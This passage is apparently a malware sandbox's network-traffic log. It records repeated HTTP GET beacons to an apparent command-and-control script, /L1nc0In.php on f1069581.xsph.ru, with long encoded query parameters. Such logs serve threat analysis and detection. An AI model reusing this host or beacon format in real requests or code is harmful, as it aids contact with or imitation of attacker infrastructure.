/L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=d1nIiojI0EWZiVTYzATYmVWZlRjZlRWZwgzY4ITOhdTY3EWOmJmIsIiZ4MjZxIzNhBzYxgzN4cTOiN2M3YWNhNGMzUjM5YDOyAjZjFDN5cjNiojImdTNyEWO4EDO1gTM0AjZmNjM5MjN2YmNyUzM3UDM1MjIsIiNkZ2N4EjM0MmM3MDZkNTMmNTM4IGMkJmYhJDOlVjNzMjZ1UmYiFWZiojIxYWY5UmYjNDM5YTZzATZlV2M0czY0EWNhRjYxcjY4UmI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETplUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIlhDZlVTYlRDOyUzMmZWM2QGOzMGOzATN4cDN4MjMiNzY2UGMzUGOxIiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&154d77d402106dff3d2a63610a8c9212=d1nIw4WSzh3RSZnUuJGcS5mY2p1RkVnVtJmdChlY25URYNmQYJGbSZEWjh3VZpWOHR1Y4ZVWwY0RSdnQYF1Y4FzY1lTbaNnRHh1YO52Ys5EWWNGes9ERKl2Tpd2RkhmQsl0cJlmYzkTbiJXNXZVavpWSvJFWZFlUtNmdOJzYwJ1aJNXSplkNJNUYwY0RVRnRtNmbWdkYsJFbJNXSplkNJl3Y3JEWRRnRXpFMOxWSzlUaiNTOtJmc1clVp9maJVEbrNGbOhlV0Z0VaBjTsl0cJlmYzkTbiJXNXZVavpWS5ZlMjZVMXlFbSNTVpdXaJVHZzIWd01mYWpUaPl2YtJGa4VlYoZ1RkRlSDxUa0IDZ2VjMhVnVslkNJNUYwY0RVRnRXpFMOxWSzl0UZJTSXlFdBR0TyklaOBTQql1N1MlZ3FERNdXQE10dBpGT4RzQNVXQ6VWavpWS6ZVbiZHaHNmdKNTWwFzaJNXSplkNJl3Y0ZkMZlmVyYVa3lWS1hHbjNmRUdlQ4VUVUxWRSNGesx0Y4ZEWjpUaPlWTuJGbW12Yq5EbJNXS5tEN0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIlhDZlVTYlRDOyUzMmZWM2QGOzMGOzATN4cDN4MjMiNzY2UGMzUGOxIiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTY